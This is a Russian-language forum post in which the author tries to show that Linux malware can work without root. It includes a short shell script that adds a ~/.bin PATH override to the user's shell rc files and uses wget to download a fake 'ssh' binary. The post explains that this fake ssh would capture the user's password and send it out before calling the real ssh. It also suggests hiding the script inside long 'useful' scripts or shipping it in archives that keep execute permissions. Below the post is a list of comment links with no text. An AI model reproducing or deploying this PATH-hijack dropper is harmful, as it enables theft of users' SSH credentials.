решил таки проверить, насколько линукс готов для вирусов.
дано: статья о том, почему на линукс нет и не может быть вирусов, ноутбук с линуксом, текстовый редактор, консоль.
доказать: можно ли исполнить более -менее вредоносный скрипт (НЕ деструктивные функции) без прав рута.
итак, что мы можем сделать без рутовых прав?
1) снести хомяк юзера. не интересно.
2) стырить конфигурационные файлы юзера со сверхсекретнымиданными^Wзашифрованными пятью алгоритмами пароли. да кому же из вирусописателей оно сдалось?
3) подменить вызов системной программы на себя. а что может быть проще этого?
итак, злоумышленник захотел подменить, допустим, ssh.
да легко!
#!/bin/sh
cd
mkdir .bin 2>/dev/null
for i in $(ls -1 *shrc 2>/dev/null); do echo «PATH='~/.bin:/bin:/usr/bin:/sbin:/usr/sbin'» >> $i; done
wget -qO ~/.bin/ssh http://...
и всё! вместо настоящего ssh можно запустить что угодно, тот же баш-скрипт, который будет вопрошать пароль да сливать куда -нибудь, потом просто вызывать /usr/bin/ssh $*.
теперь встает другой вопрос - как подсунуть этот «файл» в четыре строчки по тырнетам.
тут вариантов тоже немного -
1) спрятать их в десяти-тысяче-строчный «полезный» шелл-скрипт ;
2) распространять отдельным исполняемым файлом.
в 1м случае понятно, юзер сам запустит скрипт. а во 2м - как же юзер-НЕхомячок запустит скрипт? ведь браузеры при скачке не дают прав на исполнение! после недолгих экспериментов выяснилось, что при извлечении стандартным XFCEшным архиватором права остаются идентичными тем, какими были до упаковки. (т.е. если кто-то упаковал скрипт с правами на исполнение в архив tar.bz(2), то распаковываемый файл будет с теми же правами, что и до архивации - разве так должно быть?)
а после этого двух кликов достаточно, чтобы «установить» этот скрипт.
«вот такие пироги.» (с)
←
1
2
3
→
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от Komintern
Ответ на:
комментарий
от Komintern
Ответ на:
комментарий
от Deleted
Ответ на:
комментарий
от snoopcat
Ответ на:
комментарий
от Manhunt
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от snoopcat
Ответ на:
комментарий
от Deleted
Ответ на:
комментарий
от Gary
Ответ на:
комментарий
от Komintern
Ответ на:
комментарий
от cruxish
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от Gary
Ответ на:
комментарий
от Rastafarra
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от Gary
Ответ на:
комментарий
от aix27249
Ответ на:
комментарий
от snoopcat
Ответ на:
комментарий
от Komintern
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от Ruth
Ответ на:
комментарий
от Gary
Ответ на:
комментарий
от thesis
Ответ на:
комментарий
от Komintern
Ответ на:
комментарий
от Ruth
Ответ на:
комментарий
от gh0stwizard
Ответ на:
комментарий
от KRoN73
Ответ на:
комментарий
от PolarFox
Ответ на:
комментарий
от Ruth
Ответ на:
комментарий
от snoopcat
Ответ на:
комментарий
от snoopcat
Ответ на:
комментарий
от codoranro
Вы не можете добавлять комментарии в эту тему. Тема перемещена в архив.